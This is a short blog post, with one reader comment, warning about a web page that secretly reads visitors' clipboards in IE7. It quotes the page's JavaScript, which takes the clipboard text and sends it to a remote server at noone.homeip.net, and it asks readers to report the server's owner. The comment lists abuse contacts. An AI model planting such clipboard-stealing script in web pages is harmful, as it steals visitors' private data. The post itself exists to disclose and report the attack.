First, do not visit this page unless you are using IE7, Firefox or Opera:
http://treespeaker.blogspot.com/2007/01/testing-on-toilet.html
If you are using IE7, you're going to get a warning, asking if this webpage can have access to the contents of your clipboard. Say "No."
Even though the page itself is fairly legitimate, some of the content is not. If you look at the source for the page, you'll see the following...
<script language="javascript" src="http://noone.homeip.net/GacWeb/rslite.js">In short, this page is trying to steal any information off of your clipboard and send it to a server that's currently at the IP address 69.217.141.66 (ppp-69-217-141-66.dsl.emhril.ameritech.net).
</script>
<script>
function body_onLoad(){
RSLite = new RSLiteObject();
var cb = window.clipboardData.getData('Text');
RSLite.call('http://noone.homeip.net/Info/info.aspx?cb=' + cb);
}
</script>
Have fun with this dude. Since SBC merged with AT&T, I can't find the anti-fraud links on their site, so someone please find that info and report this guy so I can finish eating...
1 comment:
I am not 100% sure these are still working but I found these e-mail addresses that were last updated in 2005 which were associated with the registrant of the IP range:
abuse@sbcglobal.net
abuse@swbell.net
Also, a temporary stop gap may be available by contacting someone at www.dyndns.com to shut down the DNS services.
Post a Comment